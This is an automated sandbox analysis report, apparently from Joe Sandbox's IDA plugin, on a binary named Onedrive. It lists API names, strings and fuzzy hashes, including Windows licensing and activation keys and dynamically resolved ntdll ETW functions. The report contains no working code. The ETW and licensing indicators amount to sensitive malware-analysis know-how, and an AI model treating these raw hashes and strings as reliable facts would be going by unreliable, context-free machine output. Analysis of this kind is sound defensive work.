                                        • API ID: Frame$BlockHandler3::$StateUnwind$Affinity::operator!=BaseConcurrency::details::ControlEstablisherExceptionFac_nodeFac_node::_FeatureFileFromHandlerHandler4::HardwareHeaderImageIs_bad_exception_allowedMap::endMap::iterator::operator++PresentProcessorRaiseThrow_aligned_msizestd::_std::bad_alloc::bad_allocstd::exception::exceptionweak_ptr
                                        • String ID: csm$csm$csm
                                        • API String ID: 4284016723-393685449
                                        • Opcode ID: 5a4ceb812667750a209de0e60ec4dde58dbda67a3fc9bd25ab257cf73fe31e94
                                        • Instruction ID: 7612203e7621081a4070c4b8a9414f9c4986a683708351eaf3523ac89b2bd179
                                        • Opcode Fuzzy Hash: 5a4ceb812667750a209de0e60ec4dde58dbda67a3fc9bd25ab257cf73fe31e94
                                        • Instruction Fuzzy Hash: A212083690FEC6A5EA709F56E4803EA77A4FB89780F504136DA8D47BA9DF2CD544CB00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: ENVIRONMENT$OEM_COA_NSLP$OEM_COA_SLP$OEM_DM$OEM_SLP$RETAIL$TIMEBASED_EVAL$TIMEBASED_PROMO$TIMEBASED_SUB$TIMEBASED_TRIAL$UXDifferentiator$VOLUME_KMS
                                        • API String ID: 2081463915-2552240010
                                        • Opcode ID: 7101f06e78257f19d75ce938753b12e85f23ac79d475b219decf489ddf843729
                                        • Instruction ID: cc1cbe3a26efda0806d1cad0689853d003c9780bc5dd6cfc098bf38fb92497e7
                                        • Opcode Fuzzy Hash: 7101f06e78257f19d75ce938753b12e85f23ac79d475b219decf489ddf843729
                                        • Instruction Fuzzy Hash: 1C514A60A0CE46E6FF109B15A58427D67A6BB45FA8F408039D90EC7799DF3CE42AC305
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CIDEdit1$CIDEdit2$CIDEdit3$CIDEdit4$CIDEdit5$CIDEdit6$CIDEdit7$CIDEdit8
                                        • API String ID: 0-3748838404
                                        • Opcode ID: 7197c68b65dc28501eec29134728e649a67480efd821c9b5258c505cbb260dff
                                        • Instruction ID: 3a4ba81eb2a63ecfa817f1c186124469300a954782b66e32d55487beb827c504
                                        • Opcode Fuzzy Hash: 7197c68b65dc28501eec29134728e649a67480efd821c9b5258c505cbb260dff
                                        • Instruction Fuzzy Hash: 8A310231D0CD02E6FF10AB14EA901787AA8BF59B29FD8C431D01EC23A8DF3C66998711
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Direct$Parser@$CreateElement@V12@$#100.Create@CurrentDescendent@Destroy@E__@@0@Element@2@1FindFromItemObjectQueueResource@ThreadUserV32@@Value@2@Work
                                        • String ID: EnterNumber$LocationCombobox$PhoneActivation$TouchID
                                        • API String ID: 3922143050-3457259764
                                        • Opcode ID: e68c5357bdebdf1565543b18696b6f7c2650a5030905b38387725ce4b364b396
                                        • Instruction ID: 368330c75eb15ee403837de0b8e0b89372d9c438c7740543ee8853cb6058eda7
                                        • Opcode Fuzzy Hash: e68c5357bdebdf1565543b18696b6f7c2650a5030905b38387725ce4b364b396
                                        • Instruction Fuzzy Hash: 0981E625B09F47E2EF009B6AE99027A77A4EB88FA8F505031CA0EC7765DF6CE4548704
                                        APIs
                                        • Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A03270B1
                                        • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A03270E7
                                          • Part of subcall function 00007FF8A03278D0: type_info::_name_internal_method.LIBCMTD ref: 00007FF8A03278F4
                                          • Part of subcall function 00007FF8A03272C0: Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A03272E0
                                        • Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A03271B7
                                          • Part of subcall function 00007FF8A0327880: __CxxFrameHandler2.LIBCMTD ref: 00007FF8A03278B8
                                        • _invoke_watson_if_error.LIBCMTD ref: 00007FF8A0327234
                                        • __crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A032727F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_$CriticalLock::_ReentrantScoped_lockScoped_lock::~_$FrameHandler2SchedulerScheduler::___crt_unique_heap_ptr_invoke_watson_if_errortype_info::_name_internal_method
                                        • String ID: %ls$*$?$common_expand_argv_wildcards$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$result != nullptr$traits::tcsncpy_s( character_it, character_count - (character_it - character_first), *it, count)
                                        • API String ID: 1749167088-976376051
                                        • Opcode ID: 138c8daca875b3f42370243403c8f406affa96ab05b92cba4c20d7c4dcf060f6
                                        • Instruction ID: 8b6975c8df4aa4b869310356279e2820ee591736055af2612084c784c2360c46
                                        • Opcode Fuzzy Hash: 138c8daca875b3f42370243403c8f406affa96ab05b92cba4c20d7c4dcf060f6
                                        • Instruction Fuzzy Hash: 51B11B7251EF82A5EB60DB15E4803AEB7A4FB98384F504136E68D47BA9DF3CD444CB40
                                        APIs
                                          • Part of subcall function 00007FF8A03193E0: Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A0319427
                                        • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A03194B0
                                          • Part of subcall function 00007FF8A03039B0: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FF8A03039BE
                                        • Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A0319514
                                        • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A031955E
                                        • __crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A0319579
                                          • Part of subcall function 00007FF8A03085F0: __crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A03085FE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_$CriticalLock::_ReentrantSchedulerScheduler::_Scoped_lockScoped_lock::~___crt_unique_heap_ptr$__crt_scoped_stack_ptr
                                        • String ID: create_environment$minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp$minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp$s$traits::tcscpy_s(variable.get(), required_count, source_it)
                                        • API String ID: 2249381636-3310917920
                                        • Opcode ID: 18ac9dd3f81624684d7964865a5f95cb11a2ae88c221e9388e8694d30366c2d7
                                        • Instruction ID: 29dda5ec95c30033f6144fa7f5d406170fda8484f91f0f20254697e60dcb3f4b
                                        • Opcode Fuzzy Hash: 18ac9dd3f81624684d7964865a5f95cb11a2ae88c221e9388e8694d30366c2d7
                                        • Instruction Fuzzy Hash: 6E510D2162EE83A2EA40DF55E4513AAA764FB847C1F900032F6CE47BAADF7DD514CB40
                                        APIs
                                        Strings
                                        • minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp, xrefs: 00007FF8A0335FD4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_$CriticalLock::_ReentrantScoped_lockScoped_lock::~_$ComputeMallocaSchedulerScheduler::_Size$AllocaByteCharMarkMultiStringTypeWide_freea_crtnew[]
                                        • String ID: minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp
                                        • API String ID: 3292198129-24854585
                                        • Opcode ID: 71fa810742a88bba194b3d7f30742c70f253489877922a25d7cad75b65da90a9
                                        • Instruction ID: f57394adc6e2c8bfc88f5add7ec3eb40f824c5a0ed80210f81d459acbae4b592
                                        • Opcode Fuzzy Hash: 71fa810742a88bba194b3d7f30742c70f253489877922a25d7cad75b65da90a9
                                        • Instruction Fuzzy Hash: 0F514F3291EA8296E760DB55E0853AEB7A0EBC4380F504039F68E47BA9DF7DD544CF40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: ENVIRONMENT$OEM_COA_NSLP$OEM_COA_SLP$OEM_DM$OEM_SLP$RETAIL$TIMEBASED_EVAL$TIMEBASED_PROMO$TIMEBASED_SUB$TIMEBASED_TRIAL$VOLUME_KMS
                                        • API String ID: 2081463915-1302943250
                                        • Opcode ID: fa7f94e61f269ecb3e1ff0f2dd14df86dbe6a502da5c08984cef1d8c0c194d74
                                        • Instruction ID: f92517a4e06ae0f88ecc33ed6d5dea2152a72d6e5f1b8ced3adda71e438f3f85
                                        • Opcode Fuzzy Hash: fa7f94e61f269ecb3e1ff0f2dd14df86dbe6a502da5c08984cef1d8c0c194d74
                                        • Instruction Fuzzy Hash: 3551C8B5A0DF02AAEF00AF05E98016973E8BF48BA8F658539D94DC2364DF3DE465C750
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: swap_c
                                        • String ID: %ls$base != nullptr || num == 0$comp != nullptr$minkernel\crts\ucrt\src\appcrt\stdlib\qsort.cpp$qsort$width > 0
                                        • API String ID: 1232431964-1732429825
                                        • Opcode ID: 4a3968a17c66915b21523281d7ef98170aa3125a496ee0fe839a4808240de0f2
                                        • Instruction ID: 27489649ef588c153b421b0b92a3972feda8de9315bb17bc65d6562726fd1fa6
                                        • Opcode Fuzzy Hash: 4a3968a17c66915b21523281d7ef98170aa3125a496ee0fe839a4808240de0f2
                                        • Instruction Fuzzy Hash: 9422FE3661EF8699DB608B16F48036AB7A4F7897D0F10543AEACD87B68DF7CD4408B41
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: ExecuteShell$CreateFolderFreeFromItemKnownListObjectTaskmemset
                                        • String ID: %systemroot%\system32\changepk.exe$p$page=SettingsPageActivate$windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel
                                        • API String ID: 3005131752-2606238965
                                        • Opcode ID: d4ab3d875fad306f59177a10c0067e858f47508aeac32058b376bfd7646115ab
                                        • Instruction ID: ec78843ca18710f32ee06f48fa6291f4ab91a93162080af2f787b62ecb7a43f0
                                        • Opcode Fuzzy Hash: d4ab3d875fad306f59177a10c0067e858f47508aeac32058b376bfd7646115ab
                                        • Instruction Fuzzy Hash: 98611D32A08E42E6FF548B18E5942AD77A4FB48BA8F544536EA4DC7B68DF3CD4548700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::__invoke_watson_if_error$CriticalLock::_ReentrantSchedulerScheduler::_Scoped_lockScoped_lock::~___crt_unique_heap_ptr
                                        • String ID: copy_and_add_argument_to_buffer$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count)$traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length)
                                        • API String ID: 3160871131-1477255430
                                        • Opcode ID: 56b21e0973dc36537610673c69a775868eecb0e10eaa6e6bc507c90a404b413b
                                        • Instruction ID: a0b0e9ff0837b46e958bf4768454fc57bd946f56a46f257253b912b4a01d6f18
                                        • Opcode Fuzzy Hash: 56b21e0973dc36537610673c69a775868eecb0e10eaa6e6bc507c90a404b413b
                                        • Instruction Fuzzy Hash: B1412B7291EE87A1DB20DF60E4413AAB760FB84384F500236E68D47BAADF7DD545CB40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: EtwEventEnabled$EtwEventRegister$EtwEventUnregister$EtwEventWrite$ntdll.dll
                                        • API String ID: 667068680-1838325978
                                        • Opcode ID: ba68fdd84bba215f0e08b4479e2c359e52c1883009fe3d1f84edea0320486613
                                        • Instruction ID: 5592b4a2a1dda1d9fc38f4bf8a5d0deb7c133a0f947427bbef997266a5fdca39
                                        • Opcode Fuzzy Hash: ba68fdd84bba215f0e08b4479e2c359e52c1883009fe3d1f84edea0320486613
                                        • Instruction Fuzzy Hash: 0A31036192CE43E2EF109B44E98437876E0FF4AB69F509235D90EC23A8CF7CA198C315
                                        APIs
                                        • memset.MSVCRT ref: 00007FF6104FC821
                                          • Part of subcall function 00007FF6104FDD74: GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104FC831), ref: 00007FF6104FDEB2
                                          • Part of subcall function 00007FF6104FDD74: HeapFree.KERNEL32(?,?,00000000,00007FF6104FC831), ref: 00007FF6104FDEC6
                                          • Part of subcall function 00007FF6104FD98C: GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FDA5B
                                          • Part of subcall function 00007FF6104FD98C: HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FDA6F
                                          • Part of subcall function 00007FF6104FD98C: GetProcessHeap.KERNEL32(?,?,?,00000000), ref: 00007FF6104FDA90
                                          • Part of subcall function 00007FF6104FD98C: HeapFree.KERNEL32(?,?,?,00000000), ref: 00007FF6104FDAA4
                                        • GetProcessHeap.KERNEL32 ref: 00007FF6104FC9B9
                                        • HeapFree.KERNEL32 ref: 00007FF6104FC9CD
                                          • Part of subcall function 00007FF6104FCD40: _wcsicmp.MSVCRT ref: 00007FF6104FCDA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess$_wcsicmpmemset
                                        • String ID: GraceEndDate$KernelTimebombDate$LastConsumptionReason$LastValidationError$LicenseExpirationDate$PartialProductKey$ProductKeyType$SkuId
                                        • API String ID: 1329376875-3221521310
                                        • Opcode ID: 886d2079de2440a1dc17ccb1289c6ba122f9246d015c5aedb6db7103f639f3d0
                                        • Instruction ID: a70e28ee36ce2945d4acfb083c7c1cdfeddf3de6f7cb532b54b30ccc94b1302d
                                        • Opcode Fuzzy Hash: 886d2079de2440a1dc17ccb1289c6ba122f9246d015c5aedb6db7103f639f3d0
                                        • Instruction Fuzzy Hash: 24512E51B08E17F5FF00ABAA8A901FD23A5AF45BA8F404431CA0DD7796EF79E529C344
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: strrchr
                                        • String ID: %ls$a$d$fp_format_a$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$p$p$result_buffer_count > static_cast<size_t>(1 + 4 + precision + 6)
                                        • API String ID: 3418686817-2728534095
                                        • Opcode ID: 17bfb08b7208d47e0b63ac4dfe94d956d99bbbadb31a0d70de527a98a45ae178
                                        • Instruction ID: feb1b7a0414c21b3f5bfce4c239eba1c91b657d087b8d7882fb7b9eacad48e9e
                                        • Opcode Fuzzy Hash: 17bfb08b7208d47e0b63ac4dfe94d956d99bbbadb31a0d70de527a98a45ae178
                                        • Instruction Fuzzy Hash: C122183260DBC695DBB18B59F4803AEB7A0E798B90F108026DACD87B99DF7CD445CB10
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: _aligned_msize_invoke_watson_if_error
                                        • String ID: %ls$d$e+000$fp_format_e_internal$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)$strcpy_s( p, result_buffer_count == (static_cast<size_t>(-1)) ? result_buffer_count : result_buffer_count - (p - result_buffer), "
                                        • API String ID: 1871870440-2583523412
                                        • Opcode ID: aa62fee06007f48e728819eef63ab2c458d1392a8ffd5e289f31ac39b7df481c
                                        • Instruction ID: c794e09dd169024e483c9e8532d3909541f32dd7ae871978543671d9beded92d
                                        • Opcode Fuzzy Hash: aa62fee06007f48e728819eef63ab2c458d1392a8ffd5e289f31ac39b7df481c
                                        • Instruction Fuzzy Hash: BDC12B7261EBC69AD7A0CB19E49076AB7A0F799784F005026FA8E87B59CF7DD444CB00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess$DirectoryErrorLastSystem
                                        • String ID: Tapi32.dll
                                        • API String ID: 2626721824-1902342089
                                        • Opcode ID: 42523e2f3836d451c6142b21fa8a96e0ed7b2c118e00aa92d39bf02b790cea9c
                                        • Instruction ID: 5db31d4a2244cb494df73497e29f3a0d2d6e5e0b6f7fc3c9c8d55e8cd191f0d0
                                        • Opcode Fuzzy Hash: 42523e2f3836d451c6142b21fa8a96e0ed7b2c118e00aa92d39bf02b790cea9c
                                        • Instruction Fuzzy Hash: F571A231A08E82E6EF14AB25A4841BD77A4FF85FA4F548031DA0ED7758DF3DE4258740
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$Free$Process$DirectSelect@StringTouch$AllocDirectoryErrorIndex@LastSelectionString@System
                                        • String ID:
                                        • API String ID: 796372636-0
                                        • Opcode ID: 224721544ba5d1b1ccbc45791493ce61aa77e4a84b6f17a629e37a6cd94b57d0
                                        • Instruction ID: 44602f06af42b610d730e3c5d5e5d2dc117e82ba125924a7593ad3878db80007
                                        • Opcode Fuzzy Hash: 224721544ba5d1b1ccbc45791493ce61aa77e4a84b6f17a629e37a6cd94b57d0
                                        • Instruction Fuzzy Hash: C7519F22A08E42D7EF209F29D59027AB7A5FF89FA5F199135DA0E82758DF3CE4518300
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess$AllocStringmemmove
                                        • String ID:
                                        • API String ID: 62646686-0
                                        • Opcode ID: 611d1cda0b8a6a4730dab94e1e50fdd8b83e19467ea75b13cbd837236330efe6
                                        • Instruction ID: 358581b7861587933233f78ad707129676c18554be3c8b792ead943a9c6675a1
